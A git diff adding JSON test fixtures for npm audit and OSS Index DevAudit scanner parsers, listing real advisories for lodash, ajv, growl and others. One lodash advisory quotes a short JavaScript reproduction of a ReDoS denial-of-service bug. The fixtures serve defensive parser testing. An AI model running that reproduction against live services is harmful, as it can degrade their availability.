+ "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-23495\n- https://github.com/karma-runner/karma/commit/ff7edbb2ffbcdd69761bece86b7dc1ef0740508d\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2412347\n- https://snyk.io/vuln/SNYK-JS-KARMA-2396325\n- https://github.com/advisories/GHSA-rc3x-jf5g-xvc5", + "created": "2022-03-09T22:00:43.328Z", + "reported_by": null, + "title": "Open redirect in karma", + "npm_advisory_id": null, + "overview": "Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.", + "url": "https://github.com/advisories/GHSA-rc3x-jf5g-xvc5" + } + }, + "muted": [], + "metadata": { + "vulnerabilities": { + "info": 0, + "low": 2, + "moderate": 42, + "high": 28, + "critical": 3 + }, + "dependencies": 24, + "devDependencies": 1227, + "optionalDependencies": 167, + "totalDependencies": 1251 + }, + "runId": "cef9e967-13de-44ae-985f-af2d11a30ed4" +} \ No newline at end of file diff --git a/unittests/scans/npm_audit_sample/multiple_cwes2.json b/unittests/scans/npm_audit_sample/multiple_cwes2.json new file mode 100644 index 00000000000..e212e320aea --- /dev/null +++ b/unittests/scans/npm_audit_sample/multiple_cwes2.json @@ -0,0 +1,475 @@ +{ + "actions": [ + { + "action": "update", + "resolves": [ + { + "id": 1064972, + "path": "@company.frontend/eslint-config-es6>eslint-plugin-import>resolve>path-parse", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1064972, + "path": "@company.frontend/eslint-config-es6>eslint-plugin-import>eslint-import-resolver-node>resolve>path-parse", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1064972, + "path": "@company.frontend/eslint-config-es6>eslint-plugin-import>read-pkg-up>read-pkg>normalize-package-data>resolve>path-parse", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "path-parse", + "target": "1.0.7", + "depth": 7 + }, + { + "action": "update", + "resolves": [ + { + "id": 1065159, + "path": "@company.frontend/eslint-config-es6>eslint>ajv", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1065159, + "path": "@company.frontend/eslint-config-es6>eslint>table>ajv", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "ajv", + "target": "6.12.6", + "depth": 4 + }, + { + "action": "update", + "resolves": [ + { + "id": 1065169, + "path": "@company.frontend/eslint-config-es6>eslint-plugin-import>read-pkg-up>read-pkg>normalize-package-data>hosted-git-info", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "hosted-git-info", + "target": "2.8.9", + "depth": 6 + }, + { + "action": "update", + "resolves": [ + { + "id": 1065345, + "path": "@company.frontend/eslint-config-es6>eslint>inquirer>lodash", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1065345, + "path": "@company.frontend/eslint-config-es6>eslint>lodash", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1065345, + "path": "@company.frontend/eslint-config-es6>eslint>table>lodash", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1065345, + "path": "@company.frontend/eslint-config-es6>eslint-plugin-import>lodash", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1065397, + "path": "@company.frontend/eslint-config-es6>eslint>inquirer>lodash", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1065397, + "path": "@company.frontend/eslint-config-es6>eslint>lodash", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1065397, + "path": "@company.frontend/eslint-config-es6>eslint>table>lodash", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1065397, + "path": "@company.frontend/eslint-config-es6>eslint-plugin-import>lodash", + "dev": true, + "optional": false, + "bundled": false + } + ], + "module": "lodash", + "target": "4.17.21", + "depth": 4 + }, + { + "action": "review", + "module": "ansi-regex", + "resolves": [ + { + "id": 1064843, + "path": "@company.frontend/eslint-config-es6>eslint>inquirer>string-width>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1064843, + "path": "@company.frontend/eslint-config-es6>eslint>inquirer>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1064843, + "path": "@company.frontend/eslint-config-es6>eslint>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 1064843, + "path": "@company.frontend/eslint-config-es6>eslint>table>string-width>strip-ansi>ansi-regex", + "dev": true, + "optional": false, + "bundled": false + } + ] + } + ], + "advisories": { + "1064843": { + "findings": [ + { + "version": "3.0.0", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>inquirer>string-width>strip-ansi>ansi-regex" + ] + }, + { + "version": "4.1.0", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>inquirer>strip-ansi>ansi-regex" + ] + }, + { + "version": "3.0.0", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>strip-ansi>ansi-regex" + ] + }, + { + "version": "4.1.0", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>table>string-width>strip-ansi>ansi-regex" + ] + } + ], + "metadata": null, + "vulnerable_versions": ">2.1.1 <5.0.1", + "module_name": "ansi-regex", + "severity": "moderate", + "github_advisory_id": "GHSA-93q8-gq69-wqmw", + "cves": [ + "CVE-2021-3807" + ], + "access": "public", + "patched_versions": ">=5.0.1", + "cvss": { + "score": 7.5, + "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + "updated": "2021-09-23T15:45:50.000Z", + "recommendation": "Upgrade to version 5.0.1 or later", + "cwe": [ + "CWE-918", + "CWE-1333" + ], + "found_by": null, + "deleted": null, + "id": 1064843, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-3807\n- https://github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9\n- https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994\n- https://github.com/chalk/ansi-regex/issues/38#issuecomment-924086311\n- https://app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908\n- https://github.com/chalk/ansi-regex/issues/38#issuecomment-925924774\n- https://github.com/advisories/GHSA-93q8-gq69-wqmw", + "created": "2022-03-11T08:00:43.795Z", + "reported_by": null, + "title": " Inefficient Regular Expression Complexity in chalk/ansi-regex", + "npm_advisory_id": null, + "overview": "ansi-regex is vulnerable to Inefficient Regular Expression Complexity", + "url": "https://github.com/advisories/GHSA-93q8-gq69-wqmw" + }, + "1064972": { + "findings": [ + { + "version": "1.0.6", + "paths": [ + "@company.frontend/eslint-config-es6>eslint-plugin-import>resolve>path-parse", + "@company.frontend/eslint-config-es6>eslint-plugin-import>eslint-import-resolver-node>resolve>path-parse", + "@company.frontend/eslint-config-es6>eslint-plugin-import>read-pkg-up>read-pkg>normalize-package-data>resolve>path-parse" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<1.0.7", + "module_name": "path-parse", + "severity": "moderate", + "github_advisory_id": "GHSA-hj48-42vr-x3v9", + "cves": [ + "CVE-2021-23343" + ], + "access": "public", + "patched_versions": ">=1.0.7", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + "updated": "2021-08-10T15:33:31.000Z", + "recommendation": "Upgrade to version 1.0.7 or later", + "cwe": [ + "CWE-400" + ], + "found_by": null, + "deleted": null, + "id": 1064972, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-23343\n- https://github.com/jbgutierrez/path-parse/issues/8\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1279028\n- https://snyk.io/vuln/SNYK-JS-PATHPARSE-1077067\n- https://lists.apache.org/thread.html/r6a32cb3eda3b19096ad48ef1e7aa8f26e005f2f63765abb69ce08b85@%3Cdev.myfaces.apache.org%3E\n- https://github.com/jbgutierrez/path-parse/pull/10\n- https://github.com/jbgutierrez/path-parse/commit/eca63a7b9a473bf6978a2f5b7b3343662d1506f7\n- https://github.com/advisories/GHSA-hj48-42vr-x3v9", + "created": "2022-03-11T08:00:43.817Z", + "reported_by": null, + "title": "Regular Expression Denial of Service in path-parse", + "npm_advisory_id": null, + "overview": "Affected versions of npm package `path-parse` are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.", + "url": "https://github.com/advisories/GHSA-hj48-42vr-x3v9" + }, + "1065159": { + "findings": [ + { + "version": "6.10.0", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>ajv", + "@company.frontend/eslint-config-es6>eslint>table>ajv" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<6.12.3", + "module_name": "ajv", + "severity": "moderate", + "github_advisory_id": "GHSA-v88g-cgmw-v5xw", + "cves": [ + "CVE-2020-15366" + ], + "access": "public", + "patched_versions": ">=6.12.3", + "cvss": { + "score": 5.6, + "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + "updated": "2021-05-10T21:23:42.000Z", + "recommendation": "Upgrade to version 6.12.3 or later", + "cwe": [ + "CWE-915" + ], + "found_by": null, + "deleted": null, + "id": 1065159, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-15366\n- https://github.com/ajv-validator/ajv/commit/65b2f7d76b190ac63a0d4e9154c712d7aa37049f\n- https://github.com/ajv-validator/ajv/releases/tag/v6.12.3\n- https://hackerone.com/bugs?subject=user&report_id=894259\n- https://github.com/ajv-validator/ajv/tags\n- https://github.com/advisories/GHSA-v88g-cgmw-v5xw", + "created": "2022-03-11T08:00:43.828Z", + "reported_by": null, + "title": "Prototype Pollution in Ajv", + "npm_advisory_id": null, + "overview": "An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)", + "url": "https://github.com/advisories/GHSA-v88g-cgmw-v5xw" + }, + "1065169": { + "findings": [ + { + "version": "2.7.1", + "paths": [ + "@company.frontend/eslint-config-es6>eslint-plugin-import>read-pkg-up>read-pkg>normalize-package-data>hosted-git-info" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<2.8.9", + "module_name": "hosted-git-info", + "severity": "moderate", + "github_advisory_id": "GHSA-43f8-2h32-f4cj", + "cves": [ + "CVE-2021-23362" + ], + "access": "public", + "patched_versions": ">=2.8.9", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + "updated": "2021-05-07T17:39:04.000Z", + "recommendation": "Upgrade to version 2.8.9 or later", + "cwe": [ + "CWE-400" + ], + "found_by": null, + "deleted": null, + "id": 1065169, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-23362\n- https://github.com/npm/hosted-git-info/commit/bede0dc38e1785e732bf0a48ba6f81a4a908eba3\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1088356\n- https://snyk.io/vuln/SNYK-JS-HOSTEDGITINFO-1088355\n- https://github.com/npm/hosted-git-info/pull/76\n- https://github.com/npm/hosted-git-info/commit/29adfe5ef789784c861b2cdeb15051ec2ba651a7\n- https://github.com/npm/hosted-git-info/commit/8d4b3697d79bcd89cdb36d1db165e3696c783a01\n- https://github.com/npm/hosted-git-info/commits/v2\n- https://github.com/advisories/GHSA-43f8-2h32-f4cj", + "created": "2022-03-11T08:00:43.828Z", + "reported_by": null, + "title": "Regular Expression Denial of Service in hosted-git-info", + "npm_advisory_id": null, + "overview": "The npm package `hosted-git-info` before 3.0.8 are vulnerable to Regular Expression Denial of Service (ReDoS) via regular expression shortcutMatch in the fromUrl function in index.js. The affected regular expression exhibits polynomial worst-case time complexity", + "url": "https://github.com/advisories/GHSA-43f8-2h32-f4cj" + }, + "1065345": { + "findings": [ + { + "version": "4.17.19", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>inquirer>lodash" + ] + }, + { + "version": "4.17.19", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>lodash" + ] + }, + { + "version": "4.17.19", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>table>lodash" + ] + }, + { + "version": "4.17.19", + "paths": [ + "@company.frontend/eslint-config-es6>eslint-plugin-import>lodash" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<4.17.21", + "module_name": "lodash", + "severity": "high", + "github_advisory_id": "GHSA-35jh-r3h4-6jhm", + "cves": [ + "CVE-2021-23337" + ], + "access": "public", + "patched_versions": ">=4.17.21", + "cvss": { + "score": 7.2, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, + "updated": "2021-03-31T23:59:26.000Z", + "recommendation": "Upgrade to version 4.17.21 or later", + "cwe": [ + "CWE-77" + ], + "found_by": null, + "deleted": null, + "id": 1065345, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2021-23337\n- https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c\n- https://security.netapp.com/advisory/ntap-20210312-0006/\n- https://snyk.io/vuln/SNYK-JS-LODASH-1040724\n- https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851\n- https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851\n- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929\n- https://www.oracle.com//security-alerts/cpujul2021.html\n- https://www.oracle.com/security-alerts/cpuoct2021.html\n- https://www.oracle.com/security-alerts/cpujan2022.html\n- https://github.com/advisories/GHSA-35jh-r3h4-6jhm", + "created": "2022-03-11T08:00:43.837Z", + "reported_by": null, + "title": "Command Injection in lodash", + "npm_advisory_id": null, + "overview": "`lodash` versions prior to 4.17.21 are vulnerable to Command Injection via the template function.", + "url": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm" + }, + "1065397": { + "findings": [ + { + "version": "4.17.19", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>inquirer>lodash" + ] + }, + { + "version": "4.17.19", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>lodash" + ] + }, + { + "version": "4.17.19", + "paths": [ + "@company.frontend/eslint-config-es6>eslint>table>lodash" + ] + }, + { + "version": "4.17.19", + "paths": [ + "@company.frontend/eslint-config-es6>eslint-plugin-import>lodash" + ] + } + ], + "metadata": null, + "vulnerable_versions": "<4.17.21", + "module_name": "lodash", + "severity": "moderate", + "github_advisory_id": "GHSA-29mw-wpgm-hmr9", + "cves": [ + "CVE-2020-28500" + ], + "access": "public", + "patched_versions": ">=4.17.21", + "cvss": { + "score": 5.3, + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + "updated": "2021-03-19T22:45:29.000Z", + "recommendation": "Upgrade to version 4.17.21 or later", + "cwe": [], + "found_by": null, + "deleted": null, + "id": 1065397, + "references": "- https://nvd.nist.gov/vuln/detail/CVE-2020-28500\n- https://github.com/lodash/lodash/pull/5065\n- https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7\n- https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8\n- https://security.netapp.com/advisory/ntap-20210312-0006/\n- https://snyk.io/vuln/SNYK-JS-LODASH-1018905\n- https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895\n- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893\n- https://www.oracle.com//security-alerts/cpujul2021.html\n- https://www.oracle.com/security-alerts/cpuoct2021.html\n- https://www.oracle.com/security-alerts/cpujan2022.html\n- https://github.com/advisories/GHSA-29mw-wpgm-hmr9", + "created": "2022-03-11T08:00:43.839Z", + "reported_by": null, + "title": "Regular Expression Denial of Service (ReDoS) in lodash", + "npm_advisory_id": null, + "overview": "All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = \"1\" for (var i = 0; i < n; i++) { ret += \" \" } return ret + \"1\"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log(\"time_cost0: \" + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log(\"time_cost1: \" + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log(\"time_cost2: \" + time_cost2)", + "url": "https://github.com/advisories/GHSA-29mw-wpgm-hmr9" + } + }, + "muted": [], + "metadata": { + "vulnerabilities": { + "info": 0, + "low": 0, + "moderate": 14, + "high": 4, + "critical": 0 + }, + "dependencies": 19, + "devDependencies": 175, + "optionalDependencies": 0, + "totalDependencies": 194 + }, + "runId": "9394affc-7252-4392-8ce0-3e0e323df119" +} diff --git a/unittests/scans/npm_audit_sample/no_vuln.json b/unittests/scans/npm_audit_sample/no_vuln.json new file mode 100644 index 00000000000..86ae4b34cec --- /dev/null +++ b/unittests/scans/npm_audit_sample/no_vuln.json @@ -0,0 +1,18 @@ +{ + "actions": [], + "advisories": {}, + "muted": [], + "metadata":{ + "dependencies": 375, + "devDependencies": 466, + "optionalDependencies": 77, + "totalDependencies": 918, + "vulnerabilities": { + "info": 0, + "low": 0, + "moderate": 0, + "high": 0, + "critical": 0 + } + } +} diff --git a/unittests/scans/npm_audit_sample/one_vuln.json b/unittests/scans/npm_audit_sample/one_vuln.json new file mode 100644 index 00000000000..328749fbef4 --- /dev/null +++ b/unittests/scans/npm_audit_sample/one_vuln.json @@ -0,0 +1,85 @@ +{ + "actions": [ + { + "action": "install", + "module": "mocha-jenkins-reporter", + "target": "0.3.12", + "isMajor": false, + "resolves": [ + { + "id": 534, + "path": "mocha-jenkins-reporter>mocha>debug", + "dev": true, + "optional": false, + "bundled": false + }, + { + "id": 146, + "path": "mocha-jenkins-reporter>mocha>growl", + "dev": true, + "optional": false, + "bundled": false + } + ] + } + ], + "advisories": { + "146": { + "findings": [ + { + "version": "1.9.2", + "paths": [ + "mocha-jenkins-reporter>mocha>growl" + ], + "dev": true, + "optional": false, + "bundled": false + } + ], + "id": 146, + "created": "2016-09-06T12:49:40.000Z", + "updated": "2018-03-02T21:07:28.071Z", + "deleted": null, + "title": "Command Injection", + "found_by": { + "name": "Cristian-Alexandru Staicu" + }, + "reported_by": { + "name": "Cristian-Alexandru Staicu" + }, + "module_name": "growl", + "cves": [ + "CVE-2017-16042" + ], + "vulnerable_versions": "<1.10.2", + "patched_versions": ">=1.10.2", + "overview": "Affected versions of `growl` do not properly sanitize input prior to passing it into a shell command, allowing for arbitrary command execution.", + "recommendation": "Update to version 1.10.2 or later.", + "references": "[Issue #60](https://github.com/tj/node-growl/issues/60)\n[PR #61](https://github.com/tj/node-growl/pull/61)", + "access": "public", + "severity": "critical", + "cwe": "CWE-94", + "metadata": { + "module_type": "CLI.Library", + "exploitability": 5, + "affected_components": "" + }, + "url": "https://www.npmjs.com/advisories/146" + } + }, + "muted": [], + "metadata": { + "vulnerabilities": { + "info": 0, + "low": 0, + "moderate": 0, + "high": 0, + "critical": 1 + }, + "dependencies": 0, + "devDependencies": 43, + "optionalDependencies": 0, + "totalDependencies": 43 + }, + "runId": "ab9f276f-15b6-4034-a7a2-f0af6d4420f3" +} \ No newline at end of file diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_empty_cwe.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_empty_cwe.json new file mode 100644 index 00000000000..bdc4e6ab621 --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_empty_cwe.json @@ -0,0 +1,24 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "6.1", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "", + "reference": "https://snyk.io/vuln/search?q=react-dom&type=npm, https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_empty_reference.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_empty_reference.json new file mode 100644 index 00000000000..116ce993cbd --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_empty_reference.json @@ -0,0 +1,24 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "6.1", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_missing_cwe.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_missing_cwe.json new file mode 100644 index 00000000000..36a139c8226 --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_missing_cwe.json @@ -0,0 +1,23 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "6.1", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "reference": "https://snyk.io/vuln/search?q=react-dom&type=npm, https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_missing_reference.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_missing_reference.json new file mode 100644 index 00000000000..46376bc7dbc --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_missing_reference.json @@ -0,0 +1,23 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "6.1", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_multiple_vulns.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_multiple_vulns.json new file mode 100644 index 00000000000..dd891e2713f --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_multiple_vulns.json @@ -0,0 +1,43 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "6.1", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }, + { + "Package": { + "pm": "npm", + "group": "None", + "name": "axios", + "version": "0.19.2", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "f7fc0998-d7c0-4f98-aba5-661f7db01bfd", + "title": "[CVE-2020-28168] Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerabi...", + "description": "Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.", + "cvssScore": "5.9", + "cvssVector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cwe": "None", + "reference": "https://ossindex.sonatype.org/vuln/f7fc0998-d7c0-4f98-aba5-661f7db01bfd?component-type=npm&component-name=axios&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_no_vuln.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_no_vuln.json new file mode 100644 index 00000000000..aaddc352542 --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_no_vuln.json @@ -0,0 +1,5 @@ +{ + "Packages Audited": 0, + "Vulnerabilities Found": 0, + "Packages": [] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_null_cwe.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_null_cwe.json new file mode 100644 index 00000000000..692f9c15471 --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_null_cwe.json @@ -0,0 +1,24 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "6.1", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": null, + "reference": "https://snyk.io/vuln/search?q=react-dom&type=npm, https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_one_vuln.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_one_vuln.json new file mode 100644 index 00000000000..29fde3ccb5c --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_one_vuln.json @@ -0,0 +1,24 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + "Vulnerabilities": [{ + "id": "422fd048-4155-4213-8126-75b4c3135820", + "title": "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", + "description": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.", + "cvssScore": "6.1", + "cvssVector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cwe": "CWE-79", + "reference": "https://ossindex.sonatype.org/vuln/422fd048-4155-4213-8126-75b4c3135820?component-type=npm&component-name=react-dom&utm_source=devaudit&utm_medium=integration&utm_content=3.4" + } + ] + }] +} diff --git a/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_critical.json b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_critical.json new file mode 100644 index 00000000000..cba207a4ffc --- /dev/null +++ b/unittests/scans/ossindex_devaudit_sample/ossindex_devaudit_severity_critical.json @@ -0,0 +1,24 @@ +{ + "Packages Audited": 1, + "Vulnerabilities Found": 1, + "Packages": [ + { + "Package": { + "pm": "npm", + "group": "None", + "name": "react-dom", + "version": "16.4.1", + "vendor": "None" + }, + 